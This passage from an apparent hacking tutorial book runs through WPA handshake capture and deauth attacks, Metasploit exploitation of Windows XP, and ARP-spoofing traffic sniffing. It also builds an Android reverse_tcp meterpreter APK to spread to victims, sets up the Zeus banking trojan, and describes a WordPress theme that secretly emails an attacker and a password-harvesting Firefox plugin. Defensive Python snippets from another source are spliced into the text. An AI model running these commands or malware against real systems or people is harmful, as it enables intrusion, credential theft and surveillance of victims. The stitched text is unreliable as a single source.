all possible passwords that can exist, and convert them to hashes. Then we'll match the
hash we created with the one that's there in the handshake. Now if the hashes match,
we know what plain text password gave rise to the hash, thus we know the password.
If the process sounds really time-consuming to you, then it's because it is. WPA
hacking (and hash cracking in general) is a pretty resource-intensive and time-consuming
process. Now there are various different ways cracking of WPA can be done. But
since WPA is a long shot, we shall first look at the process of capturing a handshake.
We will also see what problems one can face during the process (I'll face the problems
for you). Also, before that, some optional Wikipedia theory on what a 4-way
handshake really is (you don't want to become a script kiddie, do you?)
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the
attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC,
including authentication, which is really a Message Authentication and
Integrity Code: (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC.
This sequence number will be used in the next multicast or broadcast frame, so
that the receiving STA can perform basic replay detection.
4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key, 64 bytes)
1. 16 bytes of EAPOL-Key Confirmation Key (KCK) - used to compute the MIC on
WPA EAPOL-Key messages
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - the AP uses this key to encrypt
additional data sent (in the 'Key Data' field) to the client (for example, the RSN
IE or the GTK)
3. 16 bytes of Temporal Key (TK) - used to encrypt/decrypt unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key - used to compute the MIC on
unicast data packets transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key - used to compute the MIC on
unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used
if the network is using TKIP to encrypt the data.
By the way, if you didn't understand much of it, don't worry. There's a reason
people don't search for hacking tutorials on Wikipedia (half the stuff goes over your
head).
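To make the key layout above concrete, here is an added example (not from the original tutorial, nor from the aircrack-ng or wifite projects) that carves a PTK into the sub-keys listed above and uses the KCK the way a station or AP does: to compute and verify the MIC on an EAPOL-Key frame. It also covers CCMP, whose 48-byte PTK has no Michael keys; the frame offsets and the HMAC choice per Key Descriptor Version follow 802.11i, and the sample PTK and frame bytes are constructed, not captured.

```python
import hmac
import hashlib
from dataclasses import dataclass
from typing import Optional

# PTK sizes from 802.11i: TKIP 512 bits (the five sub-keys listed above),
# CCMP/AES 384 bits (no Michael keys; CCMP carries its own integrity check).
PTK_LEN_TKIP = 64
PTK_LEN_CCMP = 48

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + key RSC (8) + key ID (8).
EAPOL_KEY_MIC_OFFSET = 81
EAPOL_KEY_MIC_LEN = 16


@dataclass(frozen=True)
class PtkKeys:
    kck: bytes                    # EAPOL-Key Confirmation Key: MIC over EAPOL-Key frames
    kek: bytes                    # EAPOL-Key Encryption Key: wraps the Key Data field
    tk: bytes                     # Temporal Key: unicast data encryption
    michael_tx: Optional[bytes]   # Michael MIC key, AP -> station (TKIP only)
    michael_rx: Optional[bytes]   # Michael MIC key, station -> AP (TKIP only)


def split_ptk(ptk: bytes, cipher: str) -> PtkKeys:
    """Carve a PTK into its sub-keys according to the pairwise cipher."""
    cipher = cipher.upper()
    if cipher == "TKIP":
        expected = PTK_LEN_TKIP
    elif cipher == "CCMP":
        expected = PTK_LEN_CCMP
    else:
        raise ValueError(f"unsupported pairwise cipher: {cipher}")
    if len(ptk) != expected:
        raise ValueError(f"{cipher} PTK must be {expected} bytes, got {len(ptk)}")
    kck, kek, tk = ptk[0:16], ptk[16:32], ptk[32:48]
    if cipher == "TKIP":
        return PtkKeys(kck, kek, tk, ptk[48:56], ptk[56:64])
    return PtkKeys(kck, kek, tk, None, None)


def eapol_key_mic(kck: bytes, frame: bytes, descriptor_version: int) -> bytes:
    """MIC the KCK puts on an EAPOL-Key frame.

    Computed over the whole EAPOL frame with the MIC field zeroed. Key Descriptor
    Version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses HMAC-SHA1
    truncated to 128 bits.
    """
    if len(kck) != 16:
        raise ValueError("KCK must be 16 bytes")
    if len(frame) < EAPOL_KEY_MIC_OFFSET + EAPOL_KEY_MIC_LEN + 2:
        raise ValueError("frame too short to be an EAPOL-Key frame")
    zeroed = (frame[:EAPOL_KEY_MIC_OFFSET]
              + bytes(EAPOL_KEY_MIC_LEN)
              + frame[EAPOL_KEY_MIC_OFFSET + EAPOL_KEY_MIC_LEN:])
    if descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if descriptor_version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:EAPOL_KEY_MIC_LEN]
    raise ValueError(f"unsupported key descriptor version: {descriptor_version}")


def verify_eapol_key_mic(kck: bytes, frame: bytes, descriptor_version: int) -> bool:
    """What the receiving side does: recompute the MIC and compare in constant time."""
    received = frame[EAPOL_KEY_MIC_OFFSET:EAPOL_KEY_MIC_OFFSET + EAPOL_KEY_MIC_LEN]
    return hmac.compare_digest(received, eapol_key_mic(kck, frame, descriptor_version))


def demo_eapol_key_frame(kck: bytes, descriptor_version: int = 2) -> bytes:
    """Constructed sample: a minimal 99-byte EAPOL-Key frame (no Key Data) with a valid MIC."""
    frame = bytearray(99)
    frame[0] = 2                                      # EAPOL protocol version (802.1X-2004)
    frame[1] = 3                                      # packet type: EAPOL-Key
    frame[2:4] = (95).to_bytes(2, "big")              # body length (99 minus 4-byte header)
    frame[4] = 2                                      # descriptor type: RSN key
    key_info = 0x0100 | 0x0008 | descriptor_version   # MIC present | pairwise | version
    frame[5:7] = key_info.to_bytes(2, "big")
    frame[7:9] = (16).to_bytes(2, "big")              # key length: 16 bytes (CCMP TK)
    frame[9:17] = (2).to_bytes(8, "big")              # replay counter
    frame[17:49] = bytes(range(32))                   # nonce (constructed, not random)
    frame[97:99] = (0).to_bytes(2, "big")             # key data length: none
    frame[EAPOL_KEY_MIC_OFFSET:EAPOL_KEY_MIC_OFFSET + EAPOL_KEY_MIC_LEN] = \
        eapol_key_mic(kck, bytes(frame), descriptor_version)
    return bytes(frame)
```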
root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked
me which target to attack. (The network has WPS enabled. This is an added bonus:
reaver can save you all the trouble, and wifite will also use reaver to skip the whole
WPA cracking process and use the WPS flaw instead. In this tutorial, however, we'll
pretend that this network does not have WPS and capture the handshake instead.)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us.
First it tried the PIN guessing attack. It has an almost 100% success rate, and would
have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried
to capture the handshake. I waited for 10-20 seconds and then pressed ctrl+c. No client
was there, so no handshake could be captured. Here's what happened.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:08:05] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0... done
[+] quitting
Now I connected my other PC to 'me'. Let's do it again. This time a client will show
up, wifite will de-authenticate it, and it'll try to connect again. Let's see what
happens this time around.
Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized that the problem was that I was using my internal card
(Kali Live USB). It does not support packet injection, so the deauth wasn't working. So
it was time to bring my external card onto the scene.
root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
See, we can use the USB card now. This will solve the problems for us.
Now look at the wifite output.
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests
were sent; one every 10 seconds is the default). The "no dictionary" error shouldn't
bother you; we'll use wifite only to capture the handshake. The captured handshake
was saved as a .cap file, which can be cracked using aircrack-ng, pyrit, hashcat (after
converting it to .hccap), etc., using either a wordlist or brute force. Let's see how to
do the same thing with airodump-ng. This time I won't show you the problems you
might run into; it'll be a perfect ride, since all the problems were seen in the wifite
case.
Now copy the BSSID field of your target network (from the airodump-ng screen) and
launch a deauth attack with aireplay-ng.
The --deauth option tells aireplay-ng to launch a deauth attack. The 0 tells it to send
deauth packets at an interval of 0 seconds (very fast, so run it only for a few seconds
and press ctrl+c). -a takes the BSSID; replace BSSID here with your target's BSSID.
mon0 is the interface you created.
In case you face problems with monitor mode hopping from one channel to another,
or problems with the beacon frame, fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel your target AP is on. You might also need to add
--ignore-negative-one if aireplay-ng demands it. In my case airodump-ng said "fixed
channel mon0: -1", so this was required. (It's a bug in the aircrack-ng suite.)
Now when you look at the airodump-ng screen, you'll see that at the top right it says
"WPA handshake" (the handshake has been captured). Here is what it looks like:
CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
* * 0 0e- 1 742 82 me
* * -35 0e- 1 0 26
Happy cracking! All that needs to be done in this tutorial has been done. It's been a
long one. Hope it helped you.
Lesson 20: Hacking Windows XP
Virtual Machines
With PostgreSQL up and running, we next need to launch the metasploit service. The
first time the service is launched, it will create a msf3 database user and a database
called msf3. The service will also launch the Metasploit RPC and Web servers it
requires.
msfconsole
show options
Now we have to change a few settings. Firstly, we should reduce the number of ports
scanned.
Secondly, we have to specify a target IP to scan. This is a bit tricky, as the IP is not
going to be the same in all cases. So here's what you'll do. Go to your XP virtual
machine (the one you are trying to hack), open a command prompt and type
ipconfig
In the results, check the IP of the machine. This is the value you'll have to set the
RHOSTS option to.
There's a slight error here: I spelled RHOSTS wrong. Make sure you add the 's' at the end.
Now we are ready for some action. Run show options again to see all the changes
you've made. Finally, type-
run
The scan will start and after some time it will show you which TCP ports are open and
vulnerable to attack.
If you are not using an unpatched version of Windows, there will not be any
vulnerable ports.
This basically means that there are no open ports here. Nothing much you can do.
However, if you had some good luck there and had a vulnerable machine, you will
have some vulnerable ports. In my case, I turned off the firewall on the Windows
machine and ran the auxiliary module again.
I got 3 open ports this time. If you are using some higher XP version, you too might
need to disable the firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has ports 135, 139 and 445
open.
Finding Exploits
This step is important. We need to figure out which exploits work on the OS we are
attacking. In our case, we already know what to do. Type back to get out of the auxiliary
scanner. Search for dcom in msfconsole.
search dcom
Copy exploit number 3 (the one whose rank shows as great). On the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again
show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
exploit
You have now successfully broken into the target computer. You have an open shell
on the target computer with administrator privileges. In short, you own that computer
now. Try out what all you can do from here on. I'll come up with more in the next
tutorial.
Open VMware Workstation. Click on File -> Open. Something like this will pop up.
Then browse to the location where you extracted the Metasploitable file. It should
look somewhat like this. Click on Open. You will see something with a VMware icon;
open that one.
Your virtual machine will be up and running within a few minutes. Depending on the
situation, a few more "next" and "enter" steps may be required, but the instructions
provided by the program are simple and clear, and you can help yourself.
I believe most of you already know about the concept of a man-in-the-middle attack,
but if you still don't, here is the definition from Wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography
and computer security is a form of active eavesdropping in which the attacker makes independent
connections with the victims and relays messages between them, making them believe that they are
talking directly to each other over a private connection, when in fact the entire conversation is
controlled by the attacker.
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf
2. You can change your terminal layout to make it easier to monitor by splitting the
Kali Linux terminal window.
5. After steps three and four, all packets sent or received by the victim should be going
through the attacker's machine.
6. Now we can try to use driftnet to monitor all of the victim's image traffic. According
to its website, Driftnet is a program which listens to network traffic and picks out
images from TCP streams it observes. Fun to run on a host which sees lots of web
traffic.
driftnet -i eth0
When the victim browses a website with images, driftnet will capture all image traffic.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will try to capture website information by using urlsnarf. To use
urlsnarf, just run this command
urlsnarf -i eth0
and urlsnarf will start capturing all website addresses visited by the victim machine.
9. When the victim browses a website, the attacker will know the address the victim
visited.
Lesson 23: Metasploitable 2 Vulnerability Assessment
Portscan
On a Kali Linux machine, open a terminal. Type ifconfig and note the eth0 IP
address. This will give you an idea of what the IP of your target machine could be. In
my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that
Metasploitable must have an IP somewhere in the 192.168.154.xxx range. To scan
that range, you can use an Nmap scan. Here is what it should look like.
Vulnerabilities
Now the Metasploitable 2 operating system comes loaded with a large number of
vulnerabilities. There are the following kinds of vulnerabilities in Metasploitable 2-
1. Misconfigured Services - A lot of services have been misconfigured and
provide direct entry into the operating system.
2. Backdoors - A few programs and services have been backdoored. These
backdoors can be used to gain access to the OS.
3. Weak Passwords - These are vulnerable to bruteforce attacks.
4. Vulnerable Web Services- A few web services pre-installed into
Metasploitable have known vulnerabilities which can be exploited.
5. Web Application Vulnerabilities - Some vulnerable web applications can be
exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came across during the port scan? Ports
512, 513 and 514 are there for remotely accessing Unix machines. They have been
misconfigured in such a way that anyone can set up a remote connection without
proper authentication. This vulnerability is easy to exploit. We will use rlogin to
remotely log in to Metasploitable 2. Type rlogin to see the details of the command
structure.
root@kali:~# rlogin
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[user@]hostname [command]
root@192.168.154.132's password:
As you can see, it is asking for a password. That's not because the target is not
vulnerable; it's because we don't have rsh-client installed on Kali Linux. The rsh-client
package is a remote login utility that allows users to connect to remote machines.
Installing it will start the installation process; you'll have to type yes once or twice and
Kali will do the rest for you. After the installation is successful, try your previous
command again. This time around, things will be better.
Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
applicable law.
http://help.ubuntu.com/
root@metasploitable:~#
Now you have an administrator-privilege shell on Metasploitable 2. That was as easy
as typing one line (and installing one application). We have one more such
vulnerability that can be exploited easily.
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a
popular FTP server. The version installed on Metasploitable contains a backdoor.
The backdoor was quickly identified and removed, but not before quite a few people
downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley),
the backdoored version will open a listening shell on port 6200. This means anyone
can log in to the computer without knowing the credentials, just by using ":)". This can
be exploited using Metasploit; we will cover this in the next tutorial. Till then,
something for your appetite-
telnet 192.168.99.131 1524
This is another one-line exploit, on the 1524 ingreslock port (see the port scan result).
Lesson 24: Hacking Android
Nowadays mobile users are increasing day by day, and the security threat is also
increasing together with the growth in users. Our tutorial for today is how to hack
Android smartphones using Metasploit.
What is Android? According to Wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen
mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc.,
which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with
the founding of the Open Handset Alliance: a consortium of hardware, software, and
telecommunication companies devoted to advancing open standards for mobile devices.
Android application package file (APK) is the file format used to distribute and install application
software and middleware onto Google's Android operating system; very similar to an MSI package in
Windows or a Deb package in Debian-based operating systems like Ubuntu.
Requirements:
2. We will utilize the Metasploit payload framework to create the exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp
LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above, the attacker IP address is 192.168.8.94; now execute the command.
3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the
attacker machine, the attacker needs to set up a handler to handle incoming connections on the port
specified above. Type msfconsole to go to the Metasploit console.
4. Next we need to configure the settings for the Metasploit payload we already specified in
step 3.
5. The attacker already has the APK file and now he will start distributing it (I don't need to describe
how to distribute this file; the internet is a good place for distribution).
6. Long story short: the victim (me myself) downloads the malicious APK file and installs it. After the
victim opens the application, the meterpreter session will open and the attack has begun.
7. This means that the attacker is already inside the victim's Android smartphone and can do
anything with the victim's phone,
such as:
back camera
front camera
webcam_snap 2 Would take a picture from one of the cameras
sneaky sneaky.
Conclusion:
2. If you really want to install APKs from unknown sources, make sure you can view, read and
examine the source code.
Lesson 25: Remote Administration Tool (RAT)
Today we will learn how to set up the Zeus BotNet Remote Administration Tool (RAT). We chose Zeus
because Zeus was one of the most famous trojan horses in history, infecting many servers
around 2007-2010.
If you don't know about Zeus, here is the definition from Wikipedia:
Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and
Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First
identified in July 2007 when it was used to steal information from the United States Department of
Transportation, it became more widespread in March 2009. In June 2009, security company Prevx
discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies
as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and
BusinessWeek.
In late 2010, a number of Internet security vendors including McAfee and Internet Identity claimed
that the creator of Zeus had said that he was retiring and had given the source code and rights to
sell Zeus to his biggest competitor, the creator of the SpyEye trojan. However, those same experts
warned the retirement was a ruse and expect the cracker to return with new tricks. As of 13 May
2011, the source code and compiled binaries are found to be hosted on GitHub.
Requirements:
2. Open your web browser and go to http://localhost/phpmyadmin. Input the username and
password; by default the username is root and the password is empty. After that, create a new
database. I named it bot, but you can name it whatever you want. This database name will be
used during the installation of the remote administration tool.
3. Next we need to download the remote administration tool file and extract it. You will find 3
main folders: builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I
gave the folder the name bot, then copied the server[php] contents into C:\xampp\htdocs\bot.
4. Now go back to the web browser and type http://localhost/bot/install into the
address bar. Fill in all required fields with the correct information.
Information:
The host address for MySQL is filled with your database server's IP address. If you run XAMPP it
should be your own IP address.
Database is filled with the name of the database we created in step 2.
The encryption key can be filled with any characters, with a length from 1 to 255.
ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this
MySQL server
b. On the edit user page, scroll down and find the login information section. Change the Host
from localhost to Any host and press the Go button.
6. The next step is configuring and creating the Zeus bot client. Open the builder folder and
open the config.txt configuration file. Change the url_config, url_loader and url_server settings
according to your IP address.
Click builder, then click browse. Click build the bot configuration under the actions header, then build
the bot executable.
8. After building the bot config and bot executable in step 7, we now have two new
files, config.bin and bot.exe. Copy those two files into the htdocs folder. Mine was
inside C:\xampp\htdocs\bot.
9. Now let's say we send the generated bot.exe to the victim. After the victim executes the file, we
can check our attacker server. Open the browser, go to http://localhost/bot/cp.php and
enter your username and password.
10. We can see the newly infected victim in the web interface and even view a desktop screenshot
of the victim.
Conclusion:
1. Once the victim is infected, the attacker can gather a lot of information from the victim, including all
internet activity, and even harvest website usernames and passwords, since this tool can act as
a keylogger and capture login information.
2. To prevent infection by this trojan, always update your operating system and antivirus, and do not
click any link that looks suspicious in your mail or chat messenger.
Lesson 26: Hacking Basic HTTP Authentication using
Burp Suite
Hacking HTTP Basic authentication with dictionary attacks using Burp Suite Free is our tutorial for
today; we will use a tool called Burp Suite.
If you just hear about BURP suite, here is the explanation from their website:
Burp Suite is an integrated platform for performing security testing of web applications. Its various
tools work seamlessly together to support the entire testing process, from initial mapping and
analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art
automation, to make your work faster, more effective, and more fun.
The simplest and most common HTTP authentication in use is Basic. Clients need to provide the
credentials as the Base64-encoded string username:password. If the credentials are correct,
the web server returns the requested resource; otherwise the server repeats the authentication
challenge.
Requirements:
1. Download Burp Suite from portswigger.net (in this tutorial I use the free edition) and install it.
2. Run Burp Suite and change your browser proxy settings to route through the Burp application.
By default Burp will use port 8080; if you don't know how to change the browser proxy settings, a
simple Google search can tell you how.
3. With the proxy set up, we can access the login.php file. In this example, for testing
purposes, I will input username = test and password = test. When we click the submit button (LOG
IN), Burp will intercept the data.
4. On the INTRUDER > POSITIONS tab, change the attack type to "Cluster Bomb".
5. After setting up the attack type, we can move to the PAYLOADS tab. To fill in the PAYLOADS,
see the picture in step 4.
We will set the same PHPSESSID value, because the system uses a static PHPSESSID.
6. Now we will change payload set number two; we're still on the PAYLOADS tab.
You can load the username data from a username list. I input the usernames one by one.
In this step you can also load from a password list, but in the above example I input the passwords
one by one.
Since this submit field only checks whether the user clicked the button or not, we can make it the
same value, LOG+IN%21.
9. Every PAYLOAD has been set up successfully; now we will start the attack and
watch Burp Suite perform the attack automatically. Click Intruder and choose "Start Attack".
10. Burp Suite Intruder will check the usernames and passwords one by one. When there's a
matching username and password, you can see that the response length changed. From this example
we know that the username = admin and password = 123456.
Conclusion:
1. To prevent this kind of attack, as a user you can do nothing; as a developer you can do what the
Gmail anti-brute-force system does, where every attempt is logged by the system based on the client's
IP address. If you try to log in and fail several times, the system forces the user to solve a captcha.
2. As a developer you can add a salt to the username and password to make the attack take much
longer, but in my opinion the first conclusion is better.
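As an added example (not from the original tutorial or from Burp Suite), here is what the Basic scheme described at the start of this lesson looks like on the server side, combined with the per-IP failure logging and lockout that conclusion 1 suggests: a parser for the Authorization header, salted password storage, and a guard that refuses further attempts from a client IP after too many recent failures. All names, the iteration count and the thresholds are the example's own assumptions.

```python
import base64
import binascii
import hashlib
import hmac
import os
import time
from typing import Callable, Dict, List, Optional, Tuple

PBKDF2_ITERATIONS = 100_000   # kept modest for the demo; raise it for real deployments


def basic_auth_header(username: str, password: str) -> str:
    """What the client sends: 'Basic ' + base64(username:password)."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def parse_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Decode an Authorization header; None for anything that is not well-formed Basic."""
    if not header:
        return None
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        text = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, ValueError):   # bad alphabet/padding, or not UTF-8
        return None
    # Split on the FIRST colon only: the password itself may contain colons.
    username, sep, password = text.partition(":")
    if not sep:
        return None
    return username, password


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; store (salt, digest), never the password itself."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest


class BasicAuthGuard:
    """Checks Basic credentials and locks a client IP after repeated failures."""

    def __init__(self, users: Dict[str, Tuple[bytes, bytes]], max_failures: int = 5,
                 lockout_seconds: float = 300.0,
                 clock: Callable[[], float] = time.monotonic):
        self._users = users
        self._max_failures = max_failures
        self._lockout = lockout_seconds
        self._clock = clock
        self._failures: Dict[str, List[float]] = {}   # client IP -> recent failure times
        # Dummy record so unknown usernames cost the same PBKDF2 work as real ones;
        # otherwise response time would reveal which usernames exist.
        self._dummy = hash_password("dummy-password", salt=bytes(16))

    def _recent_failures(self, ip: str) -> List[float]:
        cutoff = self._clock() - self._lockout
        recent = [t for t in self._failures.get(ip, []) if t > cutoff]
        self._failures[ip] = recent
        return recent

    def authenticate(self, client_ip: str, header: Optional[str]) -> str:
        """Return 'ok', 'denied' (bad credentials) or 'locked' (too many recent failures)."""
        if len(self._recent_failures(client_ip)) >= self._max_failures:
            return "locked"            # do not even evaluate the credentials
        creds = parse_basic_auth(header)
        ok = False
        if creds is not None:
            username, password = creds
            salt, expected = self._users.get(username, self._dummy)
            _, candidate = hash_password(password, salt)
            ok = username in self._users and hmac.compare_digest(candidate, expected)
        if ok:
            self._failures.pop(client_ip, None)
            return "ok"
        self._failures.setdefault(client_ip, []).append(self._clock())
        return "denied"
```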
Lesson 27: Hacking WordPress: Send Secret Emails from Malicious Layout Code About Site Info
Today's title is Hacking WordPress: Send Email Secretly About Website Information.
Requirements:
1. Understand PHP,
2. The script in step one, if executed, will show the details of the active (logged-in) WordPress
user. Execute this script on your local WordPress server; here is what I got:
Username: victim
Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB
User email: victim@victim.com
User first name:
User last name:
User display name: victim
User ID: 1
3. Even though we know the username and password hash, we still need time to crack the
password hash to get the user's plain password.
In our last WordPress hacking tutorial, about adding an administrator user secretly, we could add
an administrator secretly by spreading malicious themes, but the problem was: "how do we know
who has already downloaded the malicious WordPress theme?"
4. Starting from the problem in step three, we will combine this tutorial with the WordPress
hacking tutorial on adding an administrator user secretly, and send the URL address of the
infected website by inserting the following script.
5. The email address in that script is far too visible in plain text. What if we encode it using the
base64_encode PHP function? Here is the result.
6. The script I provided will secretly send an email to the attacker containing
the WordPress URL when the victim logs in and browses his/her WordPress website.
Conclusion:
3. Usually this kind of attack is found in premium WordPress themes (nulled or warez
editions); make sure you check the source code of your themes one by one to minimize the risk.
You can try to search for the strings below in your theme code (especially nulled and warez
editions) to check whether they contain malicious code or not.
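The list of strings the tutorial refers to is not reproduced on this page; as an added example (not from the tutorial), here is a small scanner built on the technique this lesson describes: it flags decoder and mail calls in theme PHP and decodes quoted base64 literals, reporting any that turn out to hide an email address or URL. The sample theme file is constructed, and the call list and length threshold are the example's own assumptions.

```python
import base64
import binascii
import re
from typing import List, NamedTuple, Optional


class Finding(NamedTuple):
    line: int      # 1-based line number in the scanned file
    kind: str      # "call" or "encoded-string"
    detail: str    # function name, or the decoded literal


# A quoted literal of 16+ base64-alphabet characters with optional padding.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
# Calls that deserve a look in theme code: decoders/obfuscators and mail senders
# (assumed list; extend it for your own review).
SUSPICIOUS_CALL = re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13|mail|wp_mail)\s*\(")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
URL_RE = re.compile(r"https?://\S+")


def decode_if_text(token: str) -> Optional[str]:
    """Decode a base64 literal and return it only if it is printable ASCII."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError):   # bad padding/alphabet, or not ASCII
        return None
    return text if text.isprintable() else None


def scan_theme_source(source: str) -> List[Finding]:
    """Report suspicious calls and base64 literals that hide an address or URL."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in SUSPICIOUS_CALL.finditer(line):
            findings.append(Finding(lineno, "call", m.group(1)))
        for m in B64_LITERAL.finditer(line):
            text = decode_if_text(m.group(1))
            if text and (EMAIL_RE.search(text) or URL_RE.search(text)):
                findings.append(Finding(lineno, "encoded-string", text))
    return findings


# Constructed sample theme file mirroring the pattern this lesson describes: the
# recipient is hidden with base64 and is mailed the site URL when a user is active.
_ENCODED_RECIPIENT = base64.b64encode(b"attacker@example.com").decode("ascii")
SAMPLE_THEME_PHP = f"""<?php
// header.php (constructed sample, not a real theme)
$user = wp_get_current_user();
$to = base64_decode('{_ENCODED_RECIPIENT}');
mail($to, 'site', get_site_url());
echo '<link rel="stylesheet" href="style.css">';
"""
```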
We will learn how to reveal the password behind the asterisks in Mozilla Firefox and Google Chrome
without looking at the saved passwords in the browser options menu.
If you have never heard about Firebug, here is the description from Wikipedia:
Firebug is a web development tool that facilitates the debugging, editing, and monitoring of
any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development
tools. Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to
run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as
external CSS, JavaScript, and image files. The net panel can display both request headers and
response headers for each page asset; it can also estimate the time each asset took to load.
Requirements:
2. Google Chrome.
2. On the Add-ons page there is a search box; type firebug into the textbox and click search, or you
can go directly to this page: https://addons.mozilla.org/en-US/firefox/addon/firebug/.
Click Install if a pop-up window asks you to install this add-on.
3. This is the Firebug button. To activate Firebug you only need to click this button; click it once
again to deactivate.
4. Now we try to open a website with a login page, e.g. mail.live.com, and input the password. Right
click on the password box and choose Inspect Element.
5. Double click type="password" and change it to type="text".
Open the login page, right click the password box and choose Inspect Element.
The title "Hacking Internet Users' Passwords Using a Malicious Firefox Plugin" came after some
students asked about the possibility of gathering usernames and passwords from a browser plugin.
The answer is yes: you can gather usernames and passwords from internet users when they have
installed a malicious plugin.
In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to
an existing software application. When an application supports plug-ins, it enables customization.
Common examples are the plug-ins used in web browsers to add new features such as search
engines, virus scanners, or the ability to use a new file type such as a new video format.
In this case, the attacker changes, adds to, modifies or creates the main function of a Firefox plugin
and overrides or rewrites some functions to perform malicious activities for the attacker's benefit.
Requirements:
2. Understand JavaScript
3. Social engineering
The victim's browser, which has a malicious Firefox plugin installed, accesses the internet. As the
victim browses the internet, the infected browser also sends data to the attacker's server:
which websites the victim visited, along with the usernames and passwords.
The attacker's harvester website grabs every GET or POST request and stores it in a simple TXT file,
but it could be changed to use a database server as well.
Conclusion:
1. Make sure you download the plugin only from trusted source (e.g: http://addons.mozilla.org/).
Lesson 30: Breaking SSL Encryption
Level : Medium, Advanced
